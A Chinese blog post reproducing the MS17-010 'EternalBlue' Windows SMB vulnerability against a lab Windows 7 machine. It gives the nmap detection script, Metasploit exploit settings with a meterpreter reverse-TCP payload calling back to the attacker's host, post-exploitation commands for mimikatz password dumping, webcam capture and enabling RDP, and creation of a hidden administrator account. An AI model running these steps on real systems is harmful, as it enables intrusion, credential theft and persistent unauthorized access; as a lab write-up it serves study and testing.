漏洞复现:”MS_17010 永恒之蓝”

漏洞影响

技术小贴
技术小贴

2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。

五个小时内,包括英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

漏洞描述

“永恒之蓝”漏洞通过445和139端口利用SMBv1NBT中的RCE,从而扫描互通网段中开放445文件共享端口的Windows机器,循环反复,受攻击机器呈指数级数度增长。

该漏洞无需用户操作,只需要受攻击机器能够上网,就会被植入勒索软件、远控木马以及挖矿程序等。

复现环境

  • Windows 7 ultimate sp1 x64
  • MSF
  • NMAP

漏洞复现

Nmap扫描

whereis nmap
cd /usr/share/nmap/scripts
ls | grep "ms17-010"
nmap --script smb-vuln-ms17-010.nse 192.168.173.138

image.png

扫描结果显示,该系统存在漏洞。

MSF监听

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.173.138
set lhost 192.168.173.1
set payload windows/x64/meterpreter/reverse_tcp
exploit

提权

meterpreter > getuid         #获取uid
meterpreter > screenshot     #截图
meterpreter > webcam_scream  #抓拍
meterpreter > load mimikatz  #获取系统密码
meterpreter > wdigest        #获取系统密码
meterpreter > run post/windows/manage/enable_rdp #开启远程桌面
rdesktop 192.168.173.138     #登录远程桌面
#开启远程桌面(修改注册表)
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

net user root$ root /add
net localgroup administrators root$ /add

原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/ldfx/

(9)
上一篇 2019年9月26日 下午4:29
下一篇 2019年9月26日 下午5:26

相关推荐

  • 插件机器人椎名真白(博客通用版)

    这次小编来介绍另外一款插件机器人:“插件机器人椎名真白(博客通用版)”。大家一起动手,把自己的博客装饰得更好看,更有趣吧。 关于Live2d的插件机器人椎名真白 在原先的基础上加上了如下功能:1.可以基于图灵机器人的聊天功能(需要自己写接口,默认隐藏)。2.能够随意移动并记录位置(关闭浏览器后失效)。3.能够随意唤醒或者关闭并记录状态。4.自动判断浏览器是否…

    2020年2月11日
    2.9K1
  • Google Hacking

    基础技术 特殊字符 *:指代任意内容 + / -:强制(不)搜索+ / -后面的内容,不得有空格 “”:强制搜索””内部包含的内容 ():Google对()不敏感,但可以帮助使用者明确搜索语法,如intext:(password|passcode) intext:(username|userid)与intext:password | passcode int…

    2019年9月26日
    2.3K0
  • 悬剑2.0安装与探究

    镜像下载 https://pan.baidu.com/s/1yfNwtbEC4blwUw9YloVjmA 解压密码:SecQuan.Org 使用PanDownload,在10M的宽带环境下下载逾十个小时,இ௰இ 镜像导入 导入OVF文件快要完成的时候报错:SHA digest of file 悬剑2.0-disk1.vmdk does not match m…

    2019年9月26日
    7.9K0
  • C语言

    基础 数据类型 C 中的类型可分为以下几种: 序号 类型与描述 1 基本类型: 它们是算术类型,包括两种类型:整数类型和浮点类型。 2 枚举类型: 它们也是算术类型,被用来定义在程序中只能赋予其一定的离散整数值的变量。 3 void 类型: 类型说明符 void 表明没有可用的值。 4 派生类型: 它们包括:指针类型、数组类型、结构类型、共用体类型和函数类型…

    2019年9月30日
    2.3K0
  • Linux命令

    查看 uname 查看系统相关信息 常用命令选项 -a: 显示主机名、内核版本、硬件平台等详细信息 -r: 显示内核版本 示例 [root@rh-6 ~]# uname -r 2.6.32-220.el6.i686 查看CPU信息 /proc/cpuinfo 示例 [root@rh-6 ~]# cat /proc/cpuinfo processor : 0 …

    2019年9月30日
    1.7K0
  • 靶机渗透之HackInOS

    环境搭建 下载HackInOS 使用VirtualBox导入ovf,注意需要使用vbox导入 主机发现 本机ip: ​ 192.168.222.131 ip发现: arp-scan –interface=eth0 192.168.222.0/24 靶机ip: ​ 192.168.222.132 00:0c:29:9e:3a:be VMware, Inc. …

    2019年9月26日
    2.6K0
  • 海外性价比高的私人代理IP购买推荐

    我们在使用各种外链群发软件比如senuke tng scrapebox或者社交营销软件比如instadub pinblster等,都要求我们配合私人代理IP,这里我们推荐一家国外主流的私人代理销售网站,我们自己每月也在使用,非常不错。 网站地址:http://buyproxies.org/ 网站目前提供的代理支持各种外链群发软件,同时指出google  fa…

    2019年11月4日
    3.1K0
  • Shell脚本编程

    简介 Shell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。 Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。 业界所说的 shell 通常都是指 shell 脚本,Shell 脚本(shell script),是一种为 shell 编…

    2019年9月30日
    2.1K0
  • CONTABO:黑色星期五优惠德国VPS

    俗话说:”便宜的vps服务器能发家致富“。今天,小编继续来推荐外贸建站服务器VPS。CONTABO:黑色星期五优惠德国VPS。 黑色星期五优惠德国VPS contabo从2003年开始运作到现在,有两处自建的独立机房,主要业务是独立服务器出租(包括设备托管),其次是VPS、虚拟主机、域名;主持银行转账、PayPal付款等方式。 商家细节介绍; KVM虚拟,1…

    2019年11月30日
    2.1K0
  • 关于宝塔面板良心插件Nginx防火墙免费版

    有人在宝塔官方论坛发布了一款宝塔面板Nginx防火墙免费版。可以使用在centos、debian、ubuntu系统的宝塔面板里。使用逻辑基本和官方版一样(可以说基本相同)。不知道官方能让这个插件存活多久。 安装方式,宝塔面板7.0.2版本。找到软件商店 – 第三方应用 – Nginx防火墙免费版1.0。安装即可。 让我们来看看界面 看了以上界面,是不是感觉非…

    2019年11月15日
    1.5K0
  • 仿站工具:一键就能下载网页模板

    这次,小编来给大家推荐一下 ”仿站工具“,”仿站工具“:一键就能下载网页模板。好使,方便,实用。 看到人家好看的网站主题模板想要怎么办?自己又不懂代码又不想花钱请人来写怎么办?接下来分享一个自用的“扒站神器”(单页面扒站工具)输入目标网站网址点击两下就可以把想要的模板网页下载下来。 平时自己收藏使用的免费分享给大家。 仿站工具 仿站(扒站)工具介绍 仿站小工…

    2019年12月15日
    2.7K0
  • 漏洞复现:”CVE_2019_0708 BlueKeep”

    环境篇 Windows7 ultimate sp1 x64 MSF 开启远程桌面: 关闭防火墙: 利用篇 早期蓝屏 这是早期漏洞利用POC! git clone https://github.com/n1xbyte/CVE-2019-0708.git cd CVE-2019-0708 pip3 install impacket python3 crashpo…

    2019年9月26日
    3.9K0